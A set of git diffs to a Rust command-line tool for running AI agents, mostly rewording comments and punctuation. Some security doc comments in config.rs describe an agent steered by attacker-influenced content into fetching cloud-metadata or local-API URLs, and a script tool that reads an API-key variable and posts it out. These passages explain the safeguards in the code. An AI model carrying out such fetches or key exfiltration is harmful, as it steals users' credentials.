-        // and the old wizard re-serialized the whole thing - silently writing
-        // a key the user deliberately kept in their environment into
+        // so a wizard that re-serializes the whole thing silently writes a key
+        // the user deliberately kept in their environment into
         // ~/.leviath/config.toml.
         let dir = tempfile::tempdir().unwrap();
 
@@ -1564,7 +1564,7 @@ pub(super) mod tests {
 
     #[test]
     fn the_provider_choice_is_a_radio_over_what_was_actually_selected() {
-        // The old free-text prompt let a typo through and only failed at the
+        // A free-text prompt lets a typo through and only fails at the
         // first agent run.
         let dir = tempfile::tempdir().unwrap();
         let mut wizard = test_wizard(dir.path());
@@ -1685,10 +1685,10 @@ pub(super) mod tests {
 
     #[test]
     fn ollama_as_the_only_provider_still_lowers_the_concurrency_limit() {
-        // Regression: the default used to be re-picked only when an arrow key
-        // moved the provider choice. With Ollama the sole selection it is
-        // already at index 0, no arrow is ever pressed, and the limit stayed at
-        // the hosted-API default of 8 - caught by driving the real TUI.
+        // Regression: re-picking the default only when an arrow key moves the
+        // provider choice misses this case. With Ollama the sole selection it
+        // is already at index 0, no arrow is ever pressed, and the limit stays
+        // at the hosted-API default of 8 - caught by driving the real TUI.
         let dir = tempfile::tempdir().unwrap();
         let mut wizard = test_wizard(dir.path());
         let ollama = wizard

--- a/crates/leviath-cli/src/commands/setup/verify.rs
+++ b/crates/leviath-cli/src/commands/setup/verify.rs
@@ -1,11 +1,11 @@
 //! Proving a provider credential actually works, before the config is written.
 //!
-//! `lev setup` used to end by printing "All API keys look valid." after a
-//! `key.starts_with("sk-ant-")` check that never touched the network - a
-//! sentence that was false for a revoked key, a key pasted with a trailing
-//! space, a key for the wrong account, and every key belonging to a provider
-//! the check did not cover at all (Google, OpenRouter, Ollama). The first time
-//! the user learned otherwise was a failed agent run.
+//! A `key.starts_with("sk-ant-")` check never touches the network, so ending
+//! `lev setup` with "All API keys look valid." on that basis is a sentence
+//! that is false for a revoked key, a key pasted with a trailing space, a key
+//! for the wrong account, and every key belonging to a provider the check does
+//! not cover at all (Google, OpenRouter, Ollama). The first time the user
+//! learns otherwise is a failed agent run.
 //!
 //! Every provider already implements
 //! [`list_models`](leviath_providers::Provider::list_models) against a real
@@ -314,7 +314,7 @@ mod tests {
     #[tokio::test]
     async fn a_rejected_credential_is_reported_as_such_not_as_a_network_problem() {
         // A 401 from a real endpoint is the case this whole module exists for:
-        // the old prefix check called this key valid.
+        // a prefix-only check calls this key valid.
         let url = spawn_mock_server(401, "Unauthorized", r#"{"error":"bad key"}"#).await;
         let mut creds = creds("ollama");
         creds.api_key = None;

--- a/crates/leviath-cli/src/commands/setup/verify.rs
+++ b/crates/leviath-cli/src/commands/setup/verify.rs
@@ -1,7 +1,7 @@
 //! Proving a provider credential actually works, before the config is written.
 //!
 //! `lev setup` used to end by printing "All API keys look valid." after a
-//! `key.starts_with("sk-ant-")` check that never touched the network — a
+//! `key.starts_with("sk-ant-")` check that never touched the network - a
 //! sentence that was false for a revoked key, a key pasted with a trailing
 //! space, a key for the wrong account, and every key belonging to a provider
 //! the check did not cover at all (Google, OpenRouter, Ollama). The first time
@@ -9,8 +9,8 @@
 //!
 //! Every provider already implements
 //! [`list_models`](leviath_providers::Provider::list_models) against a real
-//! endpoint — `/v1/models` on Anthropic and OpenAI, `/v1beta/models` on Gemini,
-//! `/api/v1/models` on OpenRouter, `/api/tags` on Ollama — so one call both
+//! endpoint - `/v1/models` on Anthropic and OpenAI, `/v1beta/models` on Gemini,
+//! `/api/v1/models` on OpenRouter, `/api/tags` on Ollama - so one call both
 //! proves the credential and returns the model list the wizard's default-model
 //! picker needs. Two answers for the price of one round trip.
 //!
@@ -27,7 +27,7 @@ use leviath_runtime::provider_creds::ProviderCreds;
 /// What a verification attempt found out.
 #[derive(Debug, Clone, PartialEq, Eq)]
 pub enum Outcome {
-    /// Not attempted — `--no-verify`, or no credential to check.
+    /// Not attempted - `--no-verify`, or no credential to check.
     Skipped,
     /// The provider answered. Carries its model ids, for the model picker.
     Reachable { models: Vec<String> },
@@ -108,15 +108,15 @@ pub async fn verify_via_registry(creds: &ProviderCreds) -> Outcome {
 /// the status code is the only part that tells the user what to *do*.
 fn describe(raw: &str) -> String {
     if raw.contains("401") || raw.contains("Unauthorized") || raw.contains("invalid_api_key") {
-        "rejected — check the key".to_string()
+        "rejected - check the key".to_string()
     } else if raw.contains("403") {
-        "forbidden — the key is valid but lacks access".to_string()
+        "forbidden - the key is valid but lacks access".to_string()
     } else if raw.contains("429") {
-        "rate limited — the key works".to_string()
+        "rate limited - the key works".to_string()
     } else if raw.contains("timed out") || raw.contains("timeout") {
-        "timed out — no answer from the provider".to_string()
+        "timed out - no answer from the provider".to_string()
     } else if raw.contains("dns") || raw.contains("connect") || raw.contains("Connection") {
-        "unreachable — check your network".to_string()
+        "unreachable - check your network".to_string()
     } else {
         raw.to_string()
     }
@@ -177,10 +177,10 @@ mod tests {
         );
         assert_eq!(
             Outcome::Failed {
-                message: "rejected — check the key".into()
+                message: "rejected - check the key".into()
             }
             .summary(),
-            "rejected — check the key"
+            "rejected - check the key"
         );
     }
 
@@ -221,31 +221,31 @@ mod tests {
     fn describe_turns_status_codes_into_advice() {
         assert_eq!(
             describe("API error 401: bad key"),
-            "rejected — check the key"
+            "rejected - check the key"
         );
-        assert_eq!(describe("Unauthorized"), "rejected — check the key");
-        assert_eq!(describe("invalid_api_key"), "rejected — check the key");
+        assert_eq!(describe("Unauthorized"), "rejected - check the key");
+        assert_eq!(describe("invalid_api_key"), "rejected - check the key");
         assert_eq!(
             describe("API error 403: no access"),
-            "forbidden — the key is valid but lacks access"
+            "forbidden - the key is valid but lacks access"
         );
         // A 429 proves the credential works, which is the useful part.
         assert_eq!(
             describe("API error 429: slow down"),
-            "rate limited — the key works"
+            "rate limited - the key works"
         );
         assert_eq!(
             describe("operation timed out"),
-            "timed out — no answer from the provider"
+            "timed out - no answer from the provider"
         );
         assert_eq!(
             describe("error trying to connect"),
-            "unreachable — check your network"
+            "unreachable - check your network"
         );
-        assert_eq!(describe("dns error"), "unreachable — check your network");
+        assert_eq!(describe("dns error"), "unreachable - check your network");
         assert_eq!(
             describe("Connection refused"),
-            "unreachable — check your network"
+            "unreachable - check your network"
         );
     }
 
@@ -325,7 +325,7 @@ mod tests {
         assert_eq!(
             outcome,
             Outcome::Failed {
-                message: "rejected — check the key".to_string()
+                message: "rejected - check the key".to_string()
             }
         );
     }

--- a/crates/leviath-cli/src/commands/test.rs
+++ b/crates/leviath-cli/src/commands/test.rs
@@ -396,7 +396,7 @@ fn validate_test_case(test: &TestCase) -> bool {
 /// Shorten a model response for the assertion-failure preview.
 ///
 /// Cuts on a char boundary: this runs on raw model output, and a byte cut-off
-/// through an emoji panicked `lev test` outright (the shape of issue #115).
+/// through an emoji once panicked `lev test` outright.
 fn truncate_str(s: &str, max: usize) -> String {
     if s.len() <= max {
         s.to_string()

--- a/crates/leviath-cli/src/commands/test.rs
+++ b/crates/leviath-cli/src/commands/test.rs
@@ -50,7 +50,7 @@ pub async fn execute(args: TestArgs) -> anyhow::Result<()> {
     execute_with_registry(args, Box::new(build_registry_from_config)).await
 }
 
-/// Builds the real provider registry from a loaded [`Config`] -- the
+/// Builds the real provider registry from a loaded [`Config`] - the
 /// production `build_registry` passed to [`execute_with_registry`] by
 /// [`execute`].
 fn build_registry_from_config(config: &Config) -> ProviderRegistry {
@@ -102,14 +102,14 @@ fn build_registry_from_config(config: &Config) -> ProviderRegistry {
 ///
 /// `build_registry` is a boxed trait object (`Box<dyn FnOnce(&Config) ->
 /// ProviderRegistry>`) rather than `impl FnOnce(&Config) -> ProviderRegistry`
-/// so every caller -- production's `build_registry_from_config` and every
-/// test's distinct `mock_registry_builder(...)` closure -- shares exactly
+/// so every caller - production's `build_registry_from_config` and every
+/// test's distinct `mock_registry_builder(...)` closure - shares exactly
 /// ONE monomorphization of this (large, many-branch) function instead of
 /// one per closure type. This was a confirmed generic-monomorphization
 /// coverage-attribution artifact: every source position had a covered
 /// instantiation (confirmed via HTML/JSON segment inspection showing no
 /// red/uncovered regions anywhere in this function), but the summary table
-/// still reported 32 regions / 21 lines missed -- the largest such residual
+/// still reported 32 regions / 21 lines missed - the largest such residual
 /// in this crate.
 async fn execute_with_registry(
     args: TestArgs,
@@ -727,7 +727,7 @@ max_tokens = 500
         assert_eq!(truncate_str("abc🎉def", 6), "abc...");
         // A boundary-aligned cut is unaffected.
         assert_eq!(truncate_str("abc🎉def", 7), "abc🎉...");
-        // Every character straddles the cut — the preview degrades to the marker
+        // Every character straddles the cut - the preview degrades to the marker
         // rather than panicking.
         assert_eq!(truncate_str("🎉🎉", 2), "...");
     }
@@ -1140,7 +1140,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
     };
 
     /// A mock provider that returns a fixed canned response, entirely in
-    /// memory -- no network calls, no subprocess spawning.
+    /// memory - no network calls, no subprocess spawning.
     struct MockProvider {
         content: String,
         tool_calls: Vec<ToolCall>,
@@ -1797,7 +1797,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
     // back to defaults instead of racing some *other*, concurrently-running
     // test's temporarily-malformed config file at the same process-global
     // env var (see `models.rs`'s own `isolate_config_path_for_test` users
-    // for the other side of that race -- without this, this whole group was
+    // for the other side of that race - without this, this whole group was
     // observed to fail intermittently, with a config-parse error instead of
     // the expected test-run outcome, when run alongside `commands::models`'s
     // test suite).
@@ -1877,7 +1877,7 @@ expect_contains = "world"
         // invoked by any other test (all of which pass an explicit `path`).
         // `cargo test`'s cwd is this crate's own source directory, which
         // has no `agent.leviath`, so this deterministically hits the
-        // "No agent.leviath found" bail -- proving the closure ran without
+        // "No agent.leviath found" bail - proving the closure ran without
         // depending on (or mutating) any real project directory.
         let args = TestArgs {
             path: None,
@@ -1956,7 +1956,7 @@ expect_contains = "unmatchable content"
                 };
 
                 // "skip_me" would fail (its expectation never matches the mock
-                // response), but the filter excludes it -- only "keep_me" runs, and
+                // response), but the filter excludes it - only "keep_me" runs, and
                 // it passes, so the whole run succeeds.
                 let result = execute_with_registry(
                     args,
@@ -2215,7 +2215,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
                 write_test_agent(project, manifest);
                 let tests_dir = project.join("tests");
                 std::fs::create_dir_all(&tests_dir).unwrap();
-                // Returns an integer, not a bool -- exercises the `else` arm of the
+                // Returns an integer, not a bool - exercises the `else` arm of the
                 // `result.as_bool()` match (treated as an automatic pass).
                 std::fs::write(tests_dir.join("script.rhai"), "42").unwrap();
 
@@ -2261,7 +2261,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
                     dry_run: false,
                 };
 
-                // Filter excludes the only script -- 0 total, reports "no test files
+                // Filter excludes the only script - 0 total, reports "no test files
                 // found" and succeeds (rather than failing on the script's `false`).
                 let result =
                     execute_with_registry(args, Box::new(mock_registry_builder("unused", vec![])))
@@ -2276,7 +2276,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
     //
     // The production registry builder passed to `execute_with_registry` by
     // `execute()`. `Provider::new`/`with_base_url` constructors just store
-    // config -- they don't make network calls -- so this is safe to exercise
+    // config - they don't make network calls - so this is safe to exercise
     // directly with fake keys, registering every provider branch.
 
     #[test]
@@ -2312,7 +2312,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
         assert!(!registry.has("openai"));
         assert!(!registry.has("google"));
         assert!(!registry.has("openrouter"));
-        // ollama has no key gate -- always registered, with the default URL
+        // ollama has no key gate - always registered, with the default URL
         // when `ollama_base_url` is unset.
         assert!(registry.has("ollama"));
     }
@@ -2335,7 +2335,7 @@ model = { provider = "anthropic", model = "claude-sonnet-4-6" }
         write_test_agent(project, manifest);
         let tests_dir = project.join("tests");
         std::fs::create_dir_all(&tests_dir).unwrap();
-        // A .txt file — neither .toml nor .rhai — exercises the implicit else
+        // A .txt file - neither .toml nor .rhai - exercises the implicit else
         // path that simply skips unrecognized files.
         std::fs::write(tests_dir.join("readme.txt"), "this file should be ignored").unwrap();
         let args = TestArgs {

--- a/crates/leviath-cli/src/commands/tools.rs
+++ b/crates/leviath-cli/src/commands/tools.rs
@@ -1,4 +1,4 @@
-//! `lev tools` — list and validate the globally available Rhai script tools
+//! `lev tools` - list and validate the globally available Rhai script tools
 //! (issue #97). These live in `<leviath-home>/tools/` and are auto-discovered by
 //! every agent at spawn; this command surfaces what's there (and what failed to
 //! compile) without starting the daemon. Agent-specific tools are validated by
@@ -21,7 +21,7 @@ pub struct ToolsArgs {
 /// daemon's own global scan in `spawn::script_scan_dirs`. `None` when no home
 /// directory resolves.
 ///
-/// This resolved to `$HOME/tools/` until the shared resolver landed — the
+/// This resolved to `$HOME/tools/` until the shared resolver landed - the
 /// `"tools"` component was joined onto the *user home* rather than the
 /// `.leviath` data root, unlike `providers/`, `agents/` and `runs/`. Every
 /// `.rhai` file found here is compiled and offered to **every** agent as an
@@ -76,7 +76,7 @@ fn params_summary(meta: &ScriptToolMeta) -> String {
         .join(", ")
 }
 
-/// The JSON view of a report (built by hand — no derive — so the shape is
+/// The JSON view of a report (built by hand - no derive - so the shape is
 /// explicit and stable).
 fn report_json(dir_label: &str, report: &ToolsReport) -> serde_json::Value {
     let tools: Vec<serde_json::Value> = report
@@ -128,7 +128,7 @@ fn report_json(dir_label: &str, report: &ToolsReport) -> serde_json::Value {
 }
 
 /// Print a report in human-readable form. Valid tools are `✓`, skipped files are
-/// `✗` with their reason (non-fatal — invalid scripts are simply not advertised,
+/// `✗` with their reason (non-fatal - invalid scripts are simply not advertised,
 /// exactly as the daemon treats them).
 fn print_human(dir_label: &str, report: &ToolsReport) {
     println!("Global script tools ({dir_label}):");
@@ -140,7 +140,7 @@ fn print_human(dir_label: &str, report: &ToolsReport) {
         let desc = if meta.description.is_empty() {
             String::new()
         } else {
-            format!(" — {}", meta.description)
+            format!(" - {}", meta.description)
         };
         // A tool compiles but only loads if the platform satisfies its `@requires`
         // (the same gate the daemon applies at spawn); flag the ones that won't,
@@ -314,8 +314,8 @@ mod tests {
 
     #[test]
     fn run_text_and_json_and_empty() {
-        // Two valid tools — a full one (description + params + requires) and a
-        // minimal one (none of those) — so print_human covers both the present
+        // Two valid tools - a full one (description + params + requires) and a
+        // minimal one (none of those) - so print_human covers both the present
         // and absent branches of each field, and sort_by actually compares.
         let dir = tempfile::tempdir().unwrap();
         std::fs::write(
@@ -346,7 +346,7 @@ mod tests {
         let home = tempfile::tempdir().unwrap();
         temp_env::with_var("LEVIATH_HOME", Some(home.path().to_str().unwrap()), || {
             // `<home>/.leviath/tools`, alongside `providers/` and `agents/`.
-            // This asserted `<home>/tools` before — the `"tools"` component was
+            // This asserted `<home>/tools` before - the `"tools"` component was
             // joined onto the user home rather than the data root. Every `.rhai`
             // file in this directory becomes an executable tool for *every*
             // agent, so it belongs inside Leviath's own directory rather than in

--- a/crates/leviath-cli/src/commands/tools.rs
+++ b/crates/leviath-cli/src/commands/tools.rs
@@ -1,5 +1,5 @@
-//! `lev tools` - list and validate the globally available Rhai script tools
-//! (issue #97). These live in `<leviath-home>/tools/` and are auto-discovered by
+//! `lev tools` - list and validate the globally available Rhai script tools.
+//! These live in `<leviath-home>/tools/` and are auto-discovered by
 //! every agent at spawn; this command surfaces what's there (and what failed to
 //! compile) without starting the daemon. Agent-specific tools are validated by
 //! `lev validate <agent>` instead.

--- a/crates/leviath-cli/src/commands/validate.rs
+++ b/crates/leviath-cli/src/commands/validate.rs
@@ -97,7 +97,7 @@ fn print_success(blueprint: &leviath_core::Blueprint) {
         );
     }
 
-    // Command seeds execute at spawn — surface them before anything else, so
+    // Command seeds execute at spawn - surface them before anything else, so
     // `lev validate` is a real audit step before `lev add`.
     for line in command_seed_report(blueprint) {
         println!("{line}");
@@ -110,7 +110,7 @@ fn print_success(blueprint: &leviath_core::Blueprint) {
 /// The report lines for a blueprint's `seed = { command = "..." }` regions.
 ///
 /// Split out from the printer so it is directly assertable. Empty when the
-/// blueprint declares none — the overwhelmingly common case, which should print
+/// blueprint declares none - the overwhelmingly common case, which should print
 /// nothing at all.
 fn command_seed_report(blueprint: &leviath_core::Blueprint) -> Vec<String> {
     let seeds: Vec<(&str, &str)> = blueprint
@@ -147,8 +147,8 @@ fn command_seed_report(blueprint: &leviath_core::Blueprint) -> Vec<String> {
 
 /// Outcome of the real, testable logic in [`execute`]. Kept distinct from
 /// the actual `std::process::exit(1)` calls (which would kill the test
-/// process if exercised directly) so `execute_reporting_outcome` -- and
-/// therefore every branch of `check_manifest`'s error handling -- can be
+/// process if exercised directly) so `execute_reporting_outcome` - and
+/// therefore every branch of `check_manifest`'s error handling - can be
 /// unit tested; only the thin `execute` wrapper below ever calls `exit`.
 enum ValidateOutcome {
     Success,
@@ -191,7 +191,7 @@ fn print_script_tool_report(path: &std::path::Path) {
         println!("  {} script tool(s) in tools/", set.len());
     }
     // A tool that compiles but whose `@requires` the platform can't satisfy won't
-    // load — flag it (this also catches an unknown/typo'd capability name).
+    // load - flag it (this also catches an unknown/typo'd capability name).
     for meta in set.metas() {
         if !crate::daemon::spawn::current_platform_satisfies(&meta.required_caps) {
             println!(
@@ -392,7 +392,7 @@ max_iterations = 5
 "#,
         );
         let bp = parse(&toml);
-        // No unreachable stages — should run without issues
+        // No unreachable stages - should run without issues
         print_warnings(&bp);
     }
 
@@ -566,7 +566,7 @@ a = "true"
         use leviath_core::{Blueprint, ContextLayout, Stage};
 
         // Stage "a" is valid on its own, but the blueprint's entry_stage
-        // points at a name that doesn't exist among `stages` -- impossible
+        // points at a name that doesn't exist among `stages` - impossible
         // via `Blueprint::validate`, but not impossible via this struct's
         // public fields/constructors.
         let mut stage_a = Stage::new("a".to_string(), make_model());
@@ -591,7 +591,7 @@ a = "true"
         use leviath_core::{Blueprint, ContextLayout, Stage, TransitionEdge};
 
         // Stage "a" transitions to "ghost", a name with no corresponding
-        // Stage entry -- impossible via `Blueprint::validate` (which
+        // Stage entry - impossible via `Blueprint::validate` (which
         // requires every transition target to exist), but constructible
         // directly since `transitions` is a public field.
         let mut transitions = std::collections::HashMap::new();
@@ -741,7 +741,7 @@ conversation = { kind = "sliding_window", max_items = 50, max_tokens = 10000 }
     // ─── execute_reporting_outcome: Parse/Validation paths ──────────────
     //
     // `execute()` itself calls `std::process::exit(1)` on these two
-    // branches, which would kill the test process -- `execute_reporting_outcome`
+    // branches, which would kill the test process - `execute_reporting_outcome`
     // exists precisely so these can be exercised without that.
 
     fn assert_is_parse_error(outcome: &ValidateOutcome) {
@@ -890,7 +890,7 @@ system = { kind = "pinned", max_tokens = 1000 }
     #[test]
     fn print_script_tool_report_only_broken_scripts_warns_without_count() {
         // A `tools/` dir with only a broken script: `set` is empty (no count
-        // line — the `!set.is_empty()` false arm) but the skipped warning runs.
+        // line - the `!set.is_empty()` false arm) but the skipped warning runs.
         let dir = tempfile::tempdir().unwrap();
         let tools = dir.path().join("tools");
         std::fs::create_dir(&tools).unwrap();
@@ -941,7 +941,7 @@ max_iterations = 5
     // ─── print_warnings: BFS revisits an already-reached node (diamond) ──
     //
     // `entry` transitions to both `b` and `c`, and both `b` and `c`
-    // transition to `d` -- `d` gets queued twice, so the *second* pop hits
+    // transition to `d` - `d` gets queued twice, so the *second* pop hits
     // the `if !reachable.insert(name.clone()) { continue; }` early-exit that
     // a simple linear chain or single-path graph never reaches.
 
@@ -1011,7 +1011,7 @@ max_iterations = 5
         let dir = tempfile::tempdir().unwrap();
         write_manifest(dir.path(), "not valid toml [[[");
         let err = check_manifest(dir.path()).unwrap_err();
-        // err is ManifestCheckError::Parse — this should panic
+        // err is ManifestCheckError::Parse - this should panic
         unwrap_io_err(err);
     }
 
@@ -1027,7 +1027,7 @@ max_iterations = 5
     fn check_manifest_unreadable_file_path_is_io_error() {
         let dir = tempfile::tempdir().unwrap();
         // Pass a path to a file that doesn't exist directly (is_file() is
-        // false, and it's not a directory either) — falls through to the
+        // false, and it's not a directory either) - falls through to the
         // "join agent.leviath" branch, which also won't exist.
         let missing = dir.path().join("nonexistent-subdir");
         let err = check_manifest(&missing).unwrap_err();

--- a/crates/leviath-cli/src/commands/validate.rs
+++ b/crates/leviath-cli/src/commands/validate.rs
@@ -171,7 +171,7 @@ fn execute_reporting_outcome(args: &ValidateArgs) -> anyhow::Result<ValidateOutc
     Ok(ValidateOutcome::Success)
 }
 
-/// Validate the agent's own Rhai script tools (issue #97): discover the agent
+/// Validate the agent's own Rhai script tools: discover the agent
 /// directory's `tools/` and report how many compiled, warning (non-fatal, like
 /// the daemon's own skip-and-warn) about any that failed. A missing `tools/` dir
 /// prints nothing.

--- a/crates/leviath-cli/src/config.rs
+++ b/crates/leviath-cli/src/config.rs
@@ -27,8 +27,9 @@ pub enum ToolPolicy {
 // dependency. Re-exported here so `crate::config::TitleConfig` paths resolve.
 pub use leviath_core::config::TitleConfig;
 
-/// Permission for one Rhai *script-tool* host function (Layer 3 of the four-layer
-/// model in issue #97). Gates what a registered script may *do*, independent of
+/// Permission for one Rhai *script-tool* host function (Layer 3 of the
+/// four-layer permission model). Gates what a registered script may *do*,
+/// independent of
 /// whether the tool itself is visible ([`available_tools`]) or approved at
 /// runtime ([`ToolPolicy`]).
 ///
@@ -107,7 +108,7 @@ pub struct Config {
     #[serde(default)]
     pub model_capabilities: HashMap<String, ModelCapabilities>,
 
-    /// Optional overrides for Rhai *script providers* (issue #101). Key is the
+    /// Optional overrides for Rhai *script providers*. Key is the
     /// provider name an agent references (e.g. `"groq"`). A script activates by
     /// being referenced + its `.rhai` file existing in the providers dir; an
     /// entry here only supplies overrides (an API key not read from env, a
@@ -223,8 +224,7 @@ pub struct Config {
 /// tracking for one agent - this one holds machine-wide switches.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
 pub struct SecurityConfig {
-    /// Whether a blueprint's `seed = { command = "..." }` regions may run
-    /// (issue #108).
+    /// Whether a blueprint's `seed = { command = "..." }` regions may run.
     ///
     /// **On by default.** A command seed executes at spawn - before the first
     /// inference, and therefore before any tool-approval prompt - so it is the
@@ -866,13 +866,13 @@ impl Config {
     /// exactly, and `LEVIATH_HOME` (via [`leviath_core::data_dir`]) redirects it
     /// along with every other home-relative path.
     ///
-    /// It used to honor only the first. `LEVIATH_HOME`'s whole purpose is to
-    /// "redirect every home-relative path at once" - that is what its doc says
-    /// and what tests, sandboxed runs and scratch environments rely on - so a
-    /// config path that quietly ignored it meant a run that believed it was
-    /// isolated would read *and write* the developer's real
-    /// `~/.leviath/config.toml`, the file holding every provider API key. Found
-    /// by doing exactly that during live testing.
+    /// Honoring both matters. `LEVIATH_HOME`'s whole purpose is to "redirect
+    /// every home-relative path at once" - that is what its doc says and what
+    /// tests, sandboxed runs and scratch environments rely on - so a config
+    /// path that quietly ignored it would let a run that believes it is
+    /// isolated read *and write* the developer's real `~/.leviath/config.toml`,
+    /// the file holding every provider API key. Found by doing exactly that
+    /// during live testing.
     pub fn config_path() -> PathBuf {
         if let Ok(override_path) = std::env::var("LEVIATH_CONFIG_PATH") {
             return PathBuf::from(override_path);
@@ -1119,8 +1119,8 @@ mod dotenv_tests {
     /// `Config::load()` reads `./.env`, and every isolated test sets
     /// `LEVIATH_SKIP_DOTENV` - so that branch would otherwise never run.
     ///
-    /// It used to be covered by the tests that read the real environment, which
-    /// is to say by the tests that were racing. Covered deliberately here
+    /// Leaving it to the tests that read the real environment would leave it to
+    /// exactly the tests that race. Covered deliberately here
     /// instead: still inside `temp_env` (so it holds the same process-wide lock
     /// as everything else) and still pointed at a scratch config, but with the
     /// skip flag cleared so the `.env` read actually happens. The probe
@@ -1794,17 +1794,16 @@ google_api_key = "AIza-existing"
     }
 
     /// The config holds every provider API key, so it must never be readable by
-    /// anyone else - not even for the instant between a `write` and a `chmod`,
-    /// which is how it used to be saved. `write_private` creates the file with
-    /// the mode already applied.
+    /// anyone else - not even for the instant between a `write` and a follow-up
+    /// `chmod`. `write_private` creates the file with the mode already applied.
     #[cfg(unix)]
     /// `LEVIATH_HOME` must redirect the config too, not just the runs and
     /// agents directories.
     ///
-    /// It did not, and the consequence was concrete: a scratch environment that
-    /// set `LEVIATH_HOME` and ran `lev mcp add` wrote to the developer's *real*
-    /// `~/.leviath/config.toml` - the file holding every provider API key -
-    /// while believing it was isolated.
+    /// Without that redirect the consequence is concrete: a scratch environment
+    /// that sets `LEVIATH_HOME` and runs `lev mcp add` writes to the developer's
+    /// *real* `~/.leviath/config.toml` - the file holding every provider API key
+    /// - while believing it is isolated.
     #[test]
     fn config_path_honors_leviath_home() {
         temp_env::with_vars(

--- a/crates/leviath-cli/src/config.rs
+++ b/crates/leviath-cli/src/config.rs
@@ -18,7 +18,7 @@ pub enum ToolPolicy {
     /// Ask the user before each call (or once per session with `allow_session`).
     #[default]
     Ask,
-    /// Never execute — return a denied error to the model.
+    /// Never execute - return a denied error to the model.
     Deny,
 }
 
@@ -38,7 +38,7 @@ pub use leviath_core::config::TitleConfig;
 pub enum ScriptPermission {
     /// The host function may run.
     Allow,
-    /// The host function is blocked — the call returns a `[denied]` error.
+    /// The host function is blocked - the call returns a `[denied]` error.
     Deny,
     /// Defer to the agent's own `tool_permissions` for the equivalent built-in
     /// (`read_file`/`shell`): permitted only when that resolves to
@@ -120,7 +120,7 @@ pub struct Config {
     ///
     /// Keys are tool names (e.g. `"bash"`, `"write_file"`). Values override the
     /// built-in defaults, and act as a **ceiling** that a blueprint's own
-    /// `[tool_permissions]` may tighten but never loosen — see
+    /// `[tool_permissions]` may tighten but never loosen - see
     /// [`crate::tools::resolve_policy`]. To grant one agent more than this
     /// without loosening it everywhere, use [`Self::agent_tool_permissions`].
     #[serde(default)]
@@ -137,7 +137,7 @@ pub struct Config {
     /// Because a blueprint may only tighten what the user configured, a global
     /// `shell = "ask"` would otherwise stop a trusted agent from pre-approving
     /// its own shell. Naming the agent here is the user saying "I trust this
-    /// one" — a decision that lives in the user's config, not the downloaded
+    /// one" - a decision that lives in the user's config, not the downloaded
     /// manifest's. Entries replace the global value for that agent, and are then
     /// the ceiling the blueprint is clamped against.
     #[serde(default)]
@@ -220,14 +220,14 @@ pub struct Config {
 /// `[security]` in `~/.leviath/config.toml`.
 ///
 /// Distinct from a *blueprint's* `[security]` block, which configures taint
-/// tracking for one agent — this one holds machine-wide switches.
+/// tracking for one agent - this one holds machine-wide switches.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
 pub struct SecurityConfig {
     /// Whether a blueprint's `seed = { command = "..." }` regions may run
     /// (issue #108).
     ///
-    /// **On by default.** A command seed executes at spawn — before the first
-    /// inference, and therefore before any tool-approval prompt — so it is the
+    /// **On by default.** A command seed executes at spawn - before the first
+    /// inference, and therefore before any tool-approval prompt - so it is the
     /// one place a manifest can run something without the user being asked.
     /// It is still confined to the run's workdir, routed through the entry
     /// stage's sandbox when the agent declares one, and capped by
@@ -241,15 +241,15 @@ pub struct SecurityConfig {
     /// addresses.
     ///
     /// **Off by default.** An agent's `web_fetch` URL is chosen by the model out
-    /// of context an attacker can influence — a search result, a page fetched a
-    /// moment ago, an issue body — so an unrestricted fetch makes the agent a
+    /// of context an attacker can influence - a search result, a page fetched a
+    /// moment ago, an issue body - so an unrestricted fetch makes the agent a
     /// confused deputy *inside* the user's network. The concrete targets are
     /// `http://169.254.169.254/…` (cloud metadata, which returns instance
     /// credentials), `http://127.0.0.1:3000/api/…` (the user's own `lev serve`),
     /// and anything on the LAN.
     ///
-    /// Turn this on when the agent is genuinely meant to talk to something local
-    /// — a self-hosted model, a dev server under test. It applies to the script
+    /// Turn this on when the agent is genuinely meant to talk to something local -
+    /// a self-hosted model, a dev server under test. It applies to the script
     /// host's `http_get`/`http_post` and to redirect following; see
     /// [`leviath_core::net`].
     #[serde(default)]
@@ -258,13 +258,13 @@ pub struct SecurityConfig {
     /// Credential-shaped environment variables that agent scripts may read.
     ///
     /// A Rhai script tool or script provider calling `env_var("NAME")` gets any
-    /// ordinary variable — `PATH`, `TZ`, an app's own config. A name that *looks
+    /// ordinary variable - `PATH`, `TZ`, an app's own config. A name that *looks
     /// like a credential* (see [`leviath_core::secrets::is_sensitive_env_name`])
     /// is refused unless it appears here, because a two-line script tool reading
     /// `ANTHROPIC_API_KEY` and POSTing it elsewhere was otherwise a working
     /// exfiltration path with no prompt anywhere in it.
     ///
-    /// List the exact names a script legitimately needs — typically the key for
+    /// List the exact names a script legitimately needs - typically the key for
     /// a custom provider script:
     ///
     /// ```toml
@@ -279,7 +279,7 @@ pub struct SecurityConfig {
 
     /// Where provider API keys and MCP OAuth tokens are kept.
     ///
-    /// **`file` by default** — `~/.leviath/config.toml` and
+    /// **`file` by default** - `~/.leviath/config.toml` and
     /// `~/.leviath/mcp-auth.json`, both created `0600` so they are never even
     /// briefly world-readable. This is what Claude Code and Codex do, and it is
     /// the only backend that works headless, in a container, over SSH, and on a
@@ -296,7 +296,7 @@ pub struct SecurityConfig {
     ///
     /// Then run `lev auth migrate` to move the secrets you already have. It is
     /// opt-in rather than the default because an unavailable keychain is not a
-    /// degraded experience but a broken one — every inference fails at once —
+    /// degraded experience but a broken one - every inference fails at once -
     /// and the environments Leviath is most useful in are the least likely to
     /// have a working credential store. `lev auth status` reports whether this
     /// machine actually has one.
@@ -348,7 +348,7 @@ pub struct LimitsConfig {
     #[serde(default = "default_max_concurrent_inferences")]
     pub max_concurrent_inferences: Option<usize>,
 
-    /// Size of the shared tool-execution worker pool — the number of agents whose
+    /// Size of the shared tool-execution worker pool - the number of agents whose
     /// tool batches may run concurrently across the whole daemon (the tool-lane
     /// counterpart of `max_concurrent_inferences`). Defaults to `8`. Clamped to at
     /// least 1.
@@ -462,8 +462,8 @@ pub struct ProviderConfig {
     /// Whether the Claude Code CLI transport is enabled.
     ///
